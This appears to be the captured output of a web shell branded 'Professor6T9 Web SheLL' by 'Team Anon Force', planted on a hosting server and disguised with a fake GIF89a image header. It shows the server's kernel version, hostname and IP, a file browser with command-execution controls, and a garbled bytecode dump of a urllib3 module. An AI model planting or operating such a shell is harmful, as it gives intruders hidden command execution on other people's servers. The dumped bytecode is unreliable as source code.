GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
proc
/
thread-self
/
root
/
opt
/
alt
/
python38
/
lib
/
python3.8
/
site-packages
/
urllib3
/
util
/
__pycache__
[ HOME ]
Exec
Submit
File Name : response.cpython-38.pyc
U Ƿ�f. � @ sh d dl mZ d dlmZ d dlmZmZ ddlm Z ddd�d d �Z ddd �dd�Zddd�dd�ZdS )� )�annotationsN)�!MultipartInvariantViolationDefect�StartBoundaryNotFoundDefect� )�HeaderParsingError�object�bool)�obj�returnc C sl z | � � W S tk r Y nX z| jW S tk r< Y nX z| jdkW S tk r^ Y nX td��dS )zt Checks whether a given file-like object is closed. :param obj: The file-like object to check. Nz)Unable to determine whether fp is closed.)�isclosed�AttributeError�closed�fp� ValueError)r � r �F/opt/alt/python38/lib/python3.8/site-packages/urllib3/util/response.py�is_fp_closed s r zhttplib.HTTPMessage�None)�headersr c C sn t | tj�s tdt| �� d���d}| �� sF| �� }t |ttf�rF|}dd� | j D �}|s^|rjt ||d��dS )a> Asserts whether all headers have been successfully parsed. Extracts encountered errors from the result of parsing headers. Only works on Python 3. :param http.client.HTTPMessage headers: Headers to verify. :raises urllib3.exceptions.HeaderParsingError: If parsing errors are found. zexpected httplib.Message, got �.Nc S s g | ]}t |ttf�s|�qS r )� isinstancer r )�.0�defectr r r � <listcomp>O s ��z)assert_header_parsing.<locals>.<listcomp>)�defects� unparsed_data)r �httplib�HTTPMessage� TypeError�type�is_multipart�get_payload�bytes�strr r )r r �payloadr r r r �assert_header_parsing( s �r% zhttplib.HTTPResponse)�responser c C s | j }|�� dkS )z� Checks whether the request of a response has been a HEAD-request. :param http.client.HTTPResponse response: Response to check if the originating request used 'HEAD' as a method. �HEAD)�_method�upper)r&